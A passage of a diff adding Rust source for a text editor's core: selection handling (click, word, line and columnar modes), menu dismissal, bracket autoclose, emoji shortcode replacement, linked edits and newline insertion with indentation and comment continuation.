selections.select_anchors(these_selections); + }) + }); + } + _ => {} + }); + + Subscription::join(other_subscription, this_subscription) + } + + pub fn change_selections( + &mut self, + autoscroll: Option, + window: &mut Window, + cx: &mut Context, + change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, + ) -> R { + self.change_selections_inner(autoscroll, true, window, cx, change) + } + + fn change_selections_inner( + &mut self, + autoscroll: Option, + request_completions: bool, + window: &mut Window, + cx: &mut Context, + change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, + ) -> R { + let old_cursor_position = self.selections.newest_anchor().head(); + self.push_to_selection_history(); + + let (changed, result) = self.selections.change_with(cx, change); + + if changed { + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + self.selections_did_change(true, &old_cursor_position, request_completions, window, cx); + + if self.should_open_signature_help_automatically( + &old_cursor_position, + self.signature_help_state.backspace_pressed(), + cx, + ) { + self.show_signature_help(&ShowSignatureHelp, window, cx); + } + self.signature_help_state.set_backspace_pressed(false); + } + + result + } + + pub fn edit(&mut self, edits: I, cx: &mut Context) + where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, + { + if self.read_only(cx) { + return; + } + + self.buffer + .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); + } + + pub fn edit_with_autoindent(&mut self, edits: I, cx: &mut Context) + where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, + { + if self.read_only(cx) { + return; + } + + self.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, self.autoindent_mode.clone(), cx) + }); + } + + pub fn edit_with_block_indent( + &mut self, + edits: I, + original_indent_columns: Vec>, + cx: &mut Context, + ) where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, + { + if self.read_only(cx) { + return; + } + + self.buffer.update(cx, |buffer, cx| { + buffer.edit( + edits, + Some(AutoindentMode::Block { + original_indent_columns, + }), + cx, + ) + }); + } + + fn select(&mut self, phase: SelectPhase, window: &mut Window, cx: &mut Context) { + self.hide_context_menu(window, cx); + + match phase { + SelectPhase::Begin { + position, + add, + click_count, + } => self.begin_selection(position, add, click_count, window, cx), + SelectPhase::BeginColumnar { + position, + goal_column, + reset, + } => self.begin_columnar_selection(position, goal_column, reset, window, cx), + SelectPhase::Extend { + position, + click_count, + } => self.extend_selection(position, click_count, window, cx), + SelectPhase::Update { + position, + goal_column, + scroll_delta, + } => self.update_selection(position, goal_column, scroll_delta, window, cx), + SelectPhase::End => self.end_selection(window, cx), + } + } + + fn extend_selection( + &mut self, + position: DisplayPoint, + click_count: usize, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let tail = self.selections.newest::(cx).tail(); + self.begin_selection(position, false, click_count, window, cx); + + let position = position.to_offset(&display_map, Bias::Left); + let tail_anchor = display_map.buffer_snapshot.anchor_before(tail); + + let mut pending_selection = self + .selections + .pending_anchor() + .expect("extend_selection not called with pending selection"); + if position >= tail { + pending_selection.start = tail_anchor; + } else { + pending_selection.end = tail_anchor; + pending_selection.reversed = true; + } + + let mut pending_mode = self.selections.pending_mode().unwrap(); + match &mut pending_mode { + SelectMode::Word(range) | SelectMode::Line(range) => *range = tail_anchor..tail_anchor, + _ => {} + } + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.set_pending(pending_selection, pending_mode) + }); + } + + fn begin_selection( + &mut self, + position: DisplayPoint, + add: bool, + click_count: usize, + window: &mut Window, + cx: &mut Context, + ) { + if !self.focus_handle.is_focused(window) { + self.last_focused_descendant = None; + window.focus(&self.focus_handle); + } + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + let newest_selection = self.selections.newest_anchor().clone(); + let position = display_map.clip_point(position, Bias::Left); + + let start; + let end; + let mode; + let mut auto_scroll; + match click_count { + 1 => { + start = buffer.anchor_before(position.to_point(&display_map)); + end = start; + mode = SelectMode::Character; + auto_scroll = true; + } + 2 => { + let range = movement::surrounding_word(&display_map, position); + start = buffer.anchor_before(range.start.to_point(&display_map)); + end = buffer.anchor_before(range.end.to_point(&display_map)); + mode = SelectMode::Word(start..end); + auto_scroll = true; + } + 3 => { + let position = display_map + .clip_point(position, Bias::Left) + .to_point(&display_map); + let line_start = display_map.prev_line_boundary(position).0; + let next_line_start = buffer.clip_point( + display_map.next_line_boundary(position).0 + Point::new(1, 0), + Bias::Left, + ); + start = buffer.anchor_before(line_start); + end = buffer.anchor_before(next_line_start); + mode = SelectMode::Line(start..end); + auto_scroll = true; + } + _ => { + start = buffer.anchor_before(0); + end = buffer.anchor_before(buffer.len()); + mode = SelectMode::All; + auto_scroll = false; + } + } + auto_scroll &= EditorSettings::get_global(cx).autoscroll_on_clicks; + + let point_to_delete: Option = { + let selected_points: Vec> = + self.selections.disjoint_in_range(start..end, cx); + + if !add || click_count > 1 { + None + } else if !selected_points.is_empty() { + Some(selected_points[0].id) + } else { + let clicked_point_already_selected = + self.selections.disjoint.iter().find(|selection| { + selection.start.to_point(buffer) == start.to_point(buffer) + || selection.end.to_point(buffer) == end.to_point(buffer) + }); + + clicked_point_already_selected.map(|selection| selection.id) + } + }; + + let selections_count = self.selections.count(); + + self.change_selections(auto_scroll.then(Autoscroll::newest), window, cx, |s| { + if let Some(point_to_delete) = point_to_delete { + s.delete(point_to_delete); + + if selections_count == 1 { + s.set_pending_anchor_range(start..end, mode); + } + } else { + if !add { + s.clear_disjoint(); + } else if click_count > 1 { + s.delete(newest_selection.id) + } + + s.set_pending_anchor_range(start..end, mode); + } + }); + } + + fn begin_columnar_selection( + &mut self, + position: DisplayPoint, + goal_column: u32, + reset: bool, + window: &mut Window, + cx: &mut Context, + ) { + if !self.focus_handle.is_focused(window) { + self.last_focused_descendant = None; + window.focus(&self.focus_handle); + } + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + if reset { + let pointer_position = display_map + .buffer_snapshot + .anchor_before(position.to_point(&display_map)); + + self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { + s.clear_disjoint(); + s.set_pending_anchor_range( + pointer_position..pointer_position, + SelectMode::Character, + ); + }); + } + + let tail = self.selections.newest::(cx).tail(); + self.columnar_selection_tail = Some(display_map.buffer_snapshot.anchor_before(tail)); + + if !reset { + self.select_columns( + tail.to_display_point(&display_map), + position, + goal_column, + &display_map, + window, + cx, + ); + } + } + + fn update_selection( + &mut self, + position: DisplayPoint, + goal_column: u32, + scroll_delta: gpui::Point, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + if let Some(tail) = self.columnar_selection_tail.as_ref() { + let tail = tail.to_display_point(&display_map); + self.select_columns(tail, position, goal_column, &display_map, window, cx); + } else if let Some(mut pending) = self.selections.pending_anchor() { + let buffer = self.buffer.read(cx).snapshot(cx); + let head; + let tail; + let mode = self.selections.pending_mode().unwrap(); + match &mode { + SelectMode::Character => { + head = position.to_point(&display_map); + tail = pending.tail().to_point(&buffer); + } + SelectMode::Word(original_range) => { + let original_display_range = original_range.start.to_display_point(&display_map) + ..original_range.end.to_display_point(&display_map); + let original_buffer_range = original_display_range.start.to_point(&display_map) + ..original_display_range.end.to_point(&display_map); + if movement::is_inside_word(&display_map, position) + || original_display_range.contains(&position) + { + let word_range = movement::surrounding_word(&display_map, position); + if word_range.start < original_display_range.start { + head = word_range.start.to_point(&display_map); + } else { + head = word_range.end.to_point(&display_map); + } + } else { + head = position.to_point(&display_map); + } + + if head <= original_buffer_range.start { + tail = original_buffer_range.end; + } else { + tail = original_buffer_range.start; + } + } + SelectMode::Line(original_range) => { + let original_range = original_range.to_point(&display_map.buffer_snapshot); + + let position = display_map + .clip_point(position, Bias::Left) + .to_point(&display_map); + let line_start = display_map.prev_line_boundary(position).0; + let next_line_start = buffer.clip_point( + display_map.next_line_boundary(position).0 + Point::new(1, 0), + Bias::Left, + ); + + if line_start < original_range.start { + head = line_start + } else { + head = next_line_start + } + + if head <= original_range.start { + tail = original_range.end; + } else { + tail = original_range.start; + } + } + SelectMode::All => { + return; + } + }; + + if head < tail { + pending.start = buffer.anchor_before(head); + pending.end = buffer.anchor_before(tail); + pending.reversed = true; + } else { + pending.start = buffer.anchor_before(tail); + pending.end = buffer.anchor_before(head); + pending.reversed = false; + } + + self.change_selections(None, window, cx, |s| { + s.set_pending(pending, mode); + }); + } else { + log::error!("update_selection dispatched with no pending selection"); + return; + } + + self.apply_scroll_delta(scroll_delta, window, cx); + cx.notify(); + } + + fn end_selection(&mut self, window: &mut Window, cx: &mut Context) { + self.columnar_selection_tail.take(); + if self.selections.pending_anchor().is_some() { + let selections = self.selections.all::(cx); + self.change_selections(None, window, cx, |s| { + s.select(selections); + s.clear_pending(); + }); + } + } + + fn select_columns( + &mut self, + tail: DisplayPoint, + head: DisplayPoint, + goal_column: u32, + display_map: &DisplaySnapshot, + window: &mut Window, + cx: &mut Context, + ) { + let start_row = cmp::min(tail.row(), head.row()); + let end_row = cmp::max(tail.row(), head.row()); + let start_column = cmp::min(tail.column(), goal_column); + let end_column = cmp::max(tail.column(), goal_column); + let reversed = start_column < tail.column(); + + let selection_ranges = (start_row.0..=end_row.0) + .map(DisplayRow) + .filter_map(|row| { + if start_column <= display_map.line_len(row) && !display_map.is_block_line(row) { + let start = display_map + .clip_point(DisplayPoint::new(row, start_column), Bias::Left) + .to_point(display_map); + let end = display_map + .clip_point(DisplayPoint::new(row, end_column), Bias::Right) + .to_point(display_map); + if reversed { + Some(end..start) + } else { + Some(start..end) + } + } else { + None + } + }) + .collect::>(); + + self.change_selections(None, window, cx, |s| { + s.select_ranges(selection_ranges); + }); + cx.notify(); + } + + pub fn has_non_empty_selection(&self, cx: &mut App) -> bool { + self.selections + .all_adjusted(cx) + .iter() + .any(|selection| !selection.is_empty()) + } + + pub fn has_pending_nonempty_selection(&self) -> bool { + let pending_nonempty_selection = match self.selections.pending_anchor() { + Some(Selection { start, end, .. }) => start != end, + None => false, + }; + + pending_nonempty_selection + || (self.columnar_selection_tail.is_some() && self.selections.disjoint.len() > 1) + } + + pub fn has_pending_selection(&self) -> bool { + self.selections.pending_anchor().is_some() || self.columnar_selection_tail.is_some() + } + + pub fn cancel(&mut self, _: &Cancel, window: &mut Window, cx: &mut Context) { + self.selection_mark_mode = false; + + if self.clear_expanded_diff_hunks(cx) { + cx.notify(); + return; + } + if self.dismiss_menus_and_popups(true, window, cx) { + return; + } + + if self.mode.is_full() + && self.change_selections(Some(Autoscroll::fit()), window, cx, |s| s.try_cancel()) + { + return; + } + + cx.propagate(); + } + + pub fn dismiss_menus_and_popups( + &mut self, + is_user_requested: bool, + window: &mut Window, + cx: &mut Context, + ) -> bool { + if self.take_rename(false, window, cx).is_some() { + return true; + } + + if hide_hover(self, cx) { + return true; + } + + if self.hide_signature_help(cx, SignatureHelpHiddenBy::Escape) { + return true; + } + + if self.hide_context_menu(window, cx).is_some() { + return true; + } + + if self.mouse_context_menu.take().is_some() { + return true; + } + + if is_user_requested && self.discard_inline_completion(true, cx) { + return true; + } + + if self.snippet_stack.pop().is_some() { + return true; + } + + if self.mode.is_full() && matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) { + self.dismiss_diagnostics(cx); + return true; + } + + false + } + + fn linked_editing_ranges_for( + &self, + selection: Range, + cx: &App, + ) -> Option, Vec>>> { + if self.linked_edit_ranges.is_empty() { + return None; + } + let ((base_range, linked_ranges), buffer_snapshot, buffer) = + selection.end.buffer_id.and_then(|end_buffer_id| { + if selection.start.buffer_id != Some(end_buffer_id) { + return None; + } + let buffer = self.buffer.read(cx).buffer(end_buffer_id)?; + let snapshot = buffer.read(cx).snapshot(); + self.linked_edit_ranges + .get(end_buffer_id, selection.start..selection.end, &snapshot) + .map(|ranges| (ranges, snapshot, buffer)) + })?; + use text::ToOffset as TO; + // find offset from the start of current range to current cursor position + let start_byte_offset = TO::to_offset(&base_range.start, &buffer_snapshot); + + let start_offset = TO::to_offset(&selection.start, &buffer_snapshot); + let start_difference = start_offset - start_byte_offset; + let end_offset = TO::to_offset(&selection.end, &buffer_snapshot); + let end_difference = end_offset - start_byte_offset; + // Current range has associated linked ranges. + let mut linked_edits = HashMap::<_, Vec<_>>::default(); + for range in linked_ranges.iter() { + let start_offset = TO::to_offset(&range.start, &buffer_snapshot); + let end_offset = start_offset + end_difference; + let start_offset = start_offset + start_difference; + if start_offset > buffer_snapshot.len() || end_offset > buffer_snapshot.len() { + continue; + } + if self.selections.disjoint_anchor_ranges().any(|s| { + if s.start.buffer_id != selection.start.buffer_id + || s.end.buffer_id != selection.end.buffer_id + { + return false; + } + TO::to_offset(&s.start.text_anchor, &buffer_snapshot) <= end_offset + && TO::to_offset(&s.end.text_anchor, &buffer_snapshot) >= start_offset + }) { + continue; + } + let start = buffer_snapshot.anchor_after(start_offset); + let end = buffer_snapshot.anchor_after(end_offset); + linked_edits + .entry(buffer.clone()) + .or_default() + .push(start..end); + } + Some(linked_edits) + } + + pub fn handle_input(&mut self, text: &str, window: &mut Window, cx: &mut Context) { + let text: Arc = text.into(); + + if self.read_only(cx) { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let selections = self.selections.all_adjusted(cx); + let mut bracket_inserted = false; + let mut edits = Vec::new(); + let mut linked_edits = HashMap::<_, Vec<_>>::default(); + let mut new_selections = Vec::with_capacity(selections.len()); + let mut new_autoclose_regions = Vec::new(); + let snapshot = self.buffer.read(cx).read(cx); + let mut clear_linked_edit_ranges = false; + + for (selection, autoclose_region) in + self.selections_with_autoclose_regions(selections, &snapshot) + { + if let Some(scope) = snapshot.language_scope_at(selection.head()) { + // Determine if the inserted text matches the opening or closing + // bracket of any of this language's bracket pairs. + let mut bracket_pair = None; + let mut is_bracket_pair_start = false; + let mut is_bracket_pair_end = false; + if !text.is_empty() { + let mut bracket_pair_matching_end = None; + // `text` can be empty when a user is using IME (e.g. Chinese Wubi Simplified) + // and they are removing the character that triggered IME popup. + for (pair, enabled) in scope.brackets() { + if !pair.close && !pair.surround { + continue; + } + + if enabled && pair.start.ends_with(text.as_ref()) { + let prefix_len = pair.start.len() - text.len(); + let preceding_text_matches_prefix = prefix_len == 0 + || (selection.start.column >= (prefix_len as u32) + && snapshot.contains_str_at( + Point::new( + selection.start.row, + selection.start.column - (prefix_len as u32), + ), + &pair.start[..prefix_len], + )); + if preceding_text_matches_prefix { + bracket_pair = Some(pair.clone()); + is_bracket_pair_start = true; + break; + } + } + if pair.end.as_str() == text.as_ref() && bracket_pair_matching_end.is_none() + { + // take first bracket pair matching end, but don't break in case a later bracket + // pair matches start + bracket_pair_matching_end = Some(pair.clone()); + } + } + if bracket_pair.is_none() && bracket_pair_matching_end.is_some() { + bracket_pair = Some(bracket_pair_matching_end.unwrap()); + is_bracket_pair_end = true; + } + } + + if let Some(bracket_pair) = bracket_pair { + let snapshot_settings = snapshot.language_settings_at(selection.start, cx); + let autoclose = self.use_autoclose && snapshot_settings.use_autoclose; + let auto_surround = + self.use_auto_surround && snapshot_settings.use_auto_surround; + if selection.is_empty() { + if is_bracket_pair_start { + // If the inserted text is a suffix of an opening bracket and the + // selection is preceded by the rest of the opening bracket, then + // insert the closing bracket. + let following_text_allows_autoclose = snapshot + .chars_at(selection.start) + .next() + .map_or(true, |c| scope.should_autoclose_before(c)); + + let preceding_text_allows_autoclose = selection.start.column == 0 + || snapshot.reversed_chars_at(selection.start).next().map_or( + true, + |c| { + bracket_pair.start != bracket_pair.end + || !snapshot + .char_classifier_at(selection.start) + .is_word(c) + }, + ); + + let is_closing_quote = if bracket_pair.end == bracket_pair.start + && bracket_pair.start.len() == 1 + { + let target = bracket_pair.start.chars().next().unwrap(); + let current_line_count = snapshot + .reversed_chars_at(selection.start) + .take_while(|&c| c != '\n') + .filter(|&c| c == target) + .count(); + current_line_count % 2 == 1 + } else { + false + }; + + if autoclose + && bracket_pair.close + && following_text_allows_autoclose + && preceding_text_allows_autoclose + && !is_closing_quote + { + let anchor = snapshot.anchor_before(selection.end); + new_selections.push((selection.map(|_| anchor), text.len())); + new_autoclose_regions.push(( + anchor, + text.len(), + selection.id, + bracket_pair.clone(), + )); + edits.push(( + selection.range(), + format!("{}{}", text, bracket_pair.end).into(), + )); + bracket_inserted = true; + continue; + } + } + + if let Some(region) = autoclose_region { + // If the selection is followed by an auto-inserted closing bracket, + // then don't insert that closing bracket again; just move the selection + // past the closing bracket. + let should_skip = selection.end == region.range.end.to_point(&snapshot) + && text.as_ref() == region.pair.end.as_str(); + if should_skip { + let anchor = snapshot.anchor_after(selection.end); + new_selections + .push((selection.map(|_| anchor), region.pair.end.len())); + continue; + } + } + + let always_treat_brackets_as_autoclosed = snapshot + .language_settings_at(selection.start, cx) + .always_treat_brackets_as_autoclosed; + if always_treat_brackets_as_autoclosed + && is_bracket_pair_end + && snapshot.contains_str_at(selection.end, text.as_ref()) + { + // Otherwise, when `always_treat_brackets_as_autoclosed` is set to `true + // and the inserted text is a closing bracket and the selection is followed + // by the closing bracket then move the selection past the closing bracket. + let anchor = snapshot.anchor_after(selection.end); + new_selections.push((selection.map(|_| anchor), text.len())); + continue; + } + } + // If an opening bracket is 1 character long and is typed while + // text is selected, then surround that text with the bracket pair. + else if auto_surround + && bracket_pair.surround + && is_bracket_pair_start + && bracket_pair.start.chars().count() == 1 + { + edits.push((selection.start..selection.start, text.clone())); + edits.push(( + selection.end..selection.end, + bracket_pair.end.as_str().into(), + )); + bracket_inserted = true; + new_selections.push(( + Selection { + id: selection.id, + start: snapshot.anchor_after(selection.start), + end: snapshot.anchor_before(selection.end), + reversed: selection.reversed, + goal: selection.goal, + }, + 0, + )); + continue; + } + } + } + + if self.auto_replace_emoji_shortcode + && selection.is_empty() + && text.as_ref().ends_with(':') + { + if let Some(possible_emoji_short_code) = + Self::find_possible_emoji_shortcode_at_position(&snapshot, selection.start) + { + if !possible_emoji_short_code.is_empty() { + if let Some(emoji) = emojis::get_by_shortcode(&possible_emoji_short_code) { + let emoji_shortcode_start = Point::new( + selection.start.row, + selection.start.column - possible_emoji_short_code.len() as u32 - 1, + ); + + // Remove shortcode from buffer + edits.push(( + emoji_shortcode_start..selection.start, + "".to_string().into(), + )); + new_selections.push(( + Selection { + id: selection.id, + start: snapshot.anchor_after(emoji_shortcode_start), + end: snapshot.anchor_before(selection.start), + reversed: selection.reversed, + goal: selection.goal, + }, + 0, + )); + + // Insert emoji + let selection_start_anchor = snapshot.anchor_after(selection.start); + new_selections.push((selection.map(|_| selection_start_anchor), 0)); + edits.push((selection.start..selection.end, emoji.to_string().into())); + + continue; + } + } + } + } + + // If not handling any auto-close operation, then just replace the selected + // text with the given input and move the selection to the end of the + // newly inserted text. + let anchor = snapshot.anchor_after(selection.end); + if !self.linked_edit_ranges.is_empty() { + let start_anchor = snapshot.anchor_before(selection.start); + + let is_word_char = text.chars().next().map_or(true, |char| { + let classifier = snapshot.char_classifier_at(start_anchor.to_offset(&snapshot)); + classifier.is_word(char) + }); + + if is_word_char { + if let Some(ranges) = self + .linked_editing_ranges_for(start_anchor.text_anchor..anchor.text_anchor, cx) + { + for (buffer, edits) in ranges { + linked_edits + .entry(buffer.clone()) + .or_default() + .extend(edits.into_iter().map(|range| (range, text.clone()))); + } + } + } else { + clear_linked_edit_ranges = true; + } + } + + new_selections.push((selection.map(|_| anchor), 0)); + edits.push((selection.start..selection.end, text.clone())); + } + + drop(snapshot); + + self.transact(window, cx, |this, window, cx| { + if clear_linked_edit_ranges { + this.linked_edit_ranges.clear(); + } + let initial_buffer_versions = + jsx_tag_auto_close::construct_initial_buffer_versions_map(this, &edits, cx); + + this.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, this.autoindent_mode.clone(), cx); + }); + for (buffer, edits) in linked_edits { + buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(); + let edits = edits + .into_iter() + .map(|(range, text)| { + use text::ToPoint as TP; + let end_point = TP::to_point(&range.end, &snapshot); + let start_point = TP::to_point(&range.start, &snapshot); + (start_point..end_point, text) + }) + .sorted_by_key(|(range, _)| range.start); + buffer.edit(edits, None, cx); + }) + } + let new_anchor_selections = new_selections.iter().map(|e| &e.0); + let new_selection_deltas = new_selections.iter().map(|e| e.1); + let map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); + let new_selections = resolve_selections::(new_anchor_selections, &map) + .zip(new_selection_deltas) + .map(|(selection, delta)| Selection { + id: selection.id, + start: selection.start + delta, + end: selection.end + delta, + reversed: selection.reversed, + goal: SelectionGoal::None, + }) + .collect::>(); + + let mut i = 0; + for (position, delta, selection_id, pair) in new_autoclose_regions { + let position = position.to_offset(&map.buffer_snapshot) + delta; + let start = map.buffer_snapshot.anchor_before(position); + let end = map.buffer_snapshot.anchor_after(position); + while let Some(existing_state) = this.autoclose_regions.get(i) { + match existing_state.range.start.cmp(&start, &map.buffer_snapshot) { + Ordering::Less => i += 1, + Ordering::Greater => break, + Ordering::Equal => { + match end.cmp(&existing_state.range.end, &map.buffer_snapshot) { + Ordering::Less => i += 1, + Ordering::Equal => break, + Ordering::Greater => break, + } + } + } + } + this.autoclose_regions.insert( + i, + AutocloseRegion { + selection_id, + range: start..end, + pair, + }, + ); + } + + let had_active_inline_completion = this.has_active_inline_completion(); + this.change_selections_inner(Some(Autoscroll::fit()), false, window, cx, |s| { + s.select(new_selections) + }); + + if !bracket_inserted { + if let Some(on_type_format_task) = + this.trigger_on_type_formatting(text.to_string(), window, cx) + { + on_type_format_task.detach_and_log_err(cx); + } + } + + let editor_settings = EditorSettings::get_global(cx); + if bracket_inserted + && (editor_settings.auto_signature_help + || editor_settings.show_signature_help_after_edits) + { + this.show_signature_help(&ShowSignatureHelp, window, cx); + } + + let trigger_in_words = + this.show_edit_predictions_in_menu() || !had_active_inline_completion; + if this.hard_wrap.is_some() { + let latest: Range = this.selections.newest(cx).range(); + if latest.is_empty() + && this + .buffer() + .read(cx) + .snapshot(cx) + .line_len(MultiBufferRow(latest.start.row)) + == latest.start.column + { + this.rewrap_impl( + RewrapOptions { + override_language_settings: true, + preserve_existing_whitespace: true, + }, + cx, + ) + } + } + this.trigger_completion_on_input(&text, trigger_in_words, window, cx); + linked_editing_ranges::refresh_linked_ranges(this, window, cx); + this.refresh_inline_completion(true, false, window, cx); + jsx_tag_auto_close::handle_from(this, initial_buffer_versions, window, cx); + }); + } + + fn find_possible_emoji_shortcode_at_position( + snapshot: &MultiBufferSnapshot, + position: Point, + ) -> Option { + let mut chars = Vec::new(); + let mut found_colon = false; + for char in snapshot.reversed_chars_at(position).take(100) { + // Found a possible emoji shortcode in the middle of the buffer + if found_colon { + if char.is_whitespace() { + chars.reverse(); + return Some(chars.iter().collect()); + } + // If the previous character is not a whitespace, we are in the middle of a word + // and we only want to complete the shortcode if the word is made up of other emojis + let mut containing_word = String::new(); + for ch in snapshot + .reversed_chars_at(position) + .skip(chars.len() + 1) + .take(100) + { + if ch.is_whitespace() { + break; + } + containing_word.push(ch); + } + let containing_word = containing_word.chars().rev().collect::(); + if util::word_consists_of_emojis(containing_word.as_str()) { + chars.reverse(); + return Some(chars.iter().collect()); + } + } + + if char.is_whitespace() || !char.is_ascii() { + return None; + } + if char == ':' { + found_colon = true; + } else { + chars.push(char); + } + } + // Found a possible emoji shortcode at the beginning of the buffer + chars.reverse(); + Some(chars.iter().collect()) + } + + pub fn newline(&mut self, _: &Newline, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + let (edits, selection_fixup_info): (Vec<_>, Vec<_>) = { + let selections = this.selections.all::(cx); + let multi_buffer = this.buffer.read(cx); + let buffer = multi_buffer.snapshot(cx); + selections + .iter() + .map(|selection| { + let start_point = selection.start.to_point(&buffer); + let mut indent = + buffer.indent_size_for_line(MultiBufferRow(start_point.row)); + indent.len = cmp::min(indent.len, start_point.column); + let start = selection.start; + let end = selection.end; + let selection_is_empty = start == end; + let language_scope = buffer.language_scope_at(start); + let (comment_delimiter, insert_extra_newline) = if let Some(language) = + &language_scope + { + let insert_extra_newline = + insert_extra_newline_brackets(&buffer, start..end, language) + || insert_extra_newline_tree_sitter(&buffer, start..end); + + // Comment extension on newline is allowed only for cursor selections + let comment_delimiter = maybe!({ + if !selection_is_empty { + return None; + } + + if !multi_buffer.language_settings(cx).extend_comment_on_newline { + return None; + } + + let delimiters = language.line_comment_prefixes(); + let max_len_of_delimiter = + delimiters.iter().map(|delimiter| delimiter.len()).max()?; + let (snapshot, range) = + buffer.buffer_line_for_row(MultiBufferRow(start_point.row))?; + + let mut index_of_first_non_whitespace = 0; + let comment_candidate = snapshot + .chars_for_range(range) + .skip_while(|c| { + let should_skip = c.is_whitespace(); + if should_skip { + index_of_first_non_whitespace += 1; + } + should_skip + }) + .take(max_len_of_delimiter) + .collect::(); + let comment_prefix = delimiters.iter().find(|comment_prefix| { + comment_candidate.starts_with(comment_prefix.as_ref()) + })?; + let cursor_is_placed_after_comment_marker = + index_of_first_non_whitespace + comment_prefix.len() + <= start_point.column as usize; + if cursor_is_placed_after_comment_marker { + Some(comment_prefix.clone()) + } else { + None + } + }); + (comment_delimiter, insert_extra_newline) + } else { + (None, false) + }; + + let capacity_for_delimiter = comment_delimiter + .as_deref() + .map(str::len) + .unwrap_or_default(); + let mut new_text = + String::with_capacity(1 + capacity_for_delimiter + indent.len as usize); + new_text.push('\n'); + new_text.extend(indent.chars()); + if let Some(delimiter) = &comment_delimiter { + new_text.push_str(delimiter); + } + if insert_extra_newline { + new_text = new_text.repeat(2); + } + + let anchor = buffer.anchor_after(end); + let new_selection = selection.map(|_| anchor); + ( + (start..end, new_text), + (insert_extra_newline, new_selection), + ) + }) + .unzip() + }; + + this.edit_with_autoindent(edits, cx); + let buffer = this.buffer.read(cx).snapshot(cx); + let new_selections = selection_fixup_info + .into_iter() + .map(|(extra_newline_inserted, new_selection)| { + let mut cursor = new_selection.end.to_point(&buffer); + if extra_newline_inserted { + cursor.row -= 1; + cursor.column = buffer.line_len(MultiBufferRow(cursor.row)); + } + new_selection.map(|_| cursor) + }) + .collect(); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections) + }); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn newline_above(&mut self, _: &NewlineAbove, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + + let mut edits = Vec::new(); + let mut rows = Vec::new(); + + for (rows_inserted, selection) in self.selections.all_adjusted(cx).into_iter().enumerate() { + let cursor = selection.head(); + let row = cursor.row; + + let start_of_line = snapshot.clip_point(Point::new(row, 0), Bias::Left); + + let newline = "\n".to_string(); + edits.push((start_of_line..start_of_line, newline)); + + rows.push(row + rows_inserted as u32); + } + + self.transact(window, cx, |editor, window, cx| { + editor.edit(edits, cx); + + editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let mut index = 0; + s.move_cursors_with(|map, _, _| { + let row = rows[index]; + index += 1; + + let point = Point::new(row, 0); + let boundary = map.next_line_boundary(point).1; + let clipped = map.clip_point(boundary, Bias::Left); + + (clipped, SelectionGoal::None) + }); + }); + + let mut indent_edits = Vec::new(); + let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); + for row in rows { + let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); + for (row, indent) in indents { + if indent.len == 0 { + continue; + } + + let text = match indent.kind { + IndentKind::Space => " ".repeat(indent.len as usize), + IndentKind::Tab => "\t".repeat(indent.len as usize), + }; + let point = Point::new(row.0, 0); + indent_edits.push((point..point, text)); + } + } + editor.edit(indent_edits, cx); + }); + } + + pub fn newline_below(&mut self, _: &NewlineBelow, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + + let mut edits = Vec::new(); + let mut rows = Vec::new(); + let mut rows_inserted = 0; + + for selection in self.selections.all_adjusted(cx) { + let cursor = selection.head(); + let row = cursor.row; + + let point = Point::new(row + 1, 0); + let start_of_line = snapshot.clip_point(point, Bias::Left); + + let newline = "\n".to_string(); + edits.push((start_of_line..start_of_line, newline)); + + rows_inserted += 1; + rows.push(row + rows_inserted); + } + + self.transact(window, cx, |editor, window, cx| { + editor.edit(edits, cx); + + editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let mut index = 0; + s.move_cursors_with(|map, _, _| { + let row = rows[index]; + index += 1; + + let point = Point::new(row, 0); + let boundary = map.next_line_boundary(point).1; + let clipped = map.clip_point(boundary, Bias::Left); + + (clipped, SelectionGoal::None) + }); + }); + + let mut indent_edits = Vec::new(); + let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); + for row in rows { + let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); + for (row, indent) in indents { + if indent.len == 0 { + continue; + } + + let text = match indent.kind { + IndentKind::Space => " ".repeat(indent.len as usize), + IndentKind::Tab => "\t".repeat(indent.len as usize), + }; + let point = Point::new(row.0, 0); + indent_edits.push((point..point, text)); + } + } + editor.edit(indent_edits, cx); + }); + } + + pub fn insert(&mut self, text: &str, window: &mut Window, cx: &mut Context) { + let autoindent = text.is_empty().not().then(|| AutoindentMode::Block { + original_indent_columns: Vec::new(), + }); + self.insert_with_autoindent_mode(text, autoindent, window, cx); + } + + fn insert_with_autoindent_mode( + &mut self, + text: &str, + autoindent_mode: Option, + window: &mut Window, + cx: &mut Context, + ) { + if self.read_only(cx) { + return; + } + + let text: Arc = text.into(); + self.transact(window, cx, |this, window, cx| { + let old_selections = this.selections.all_adjusted(cx); 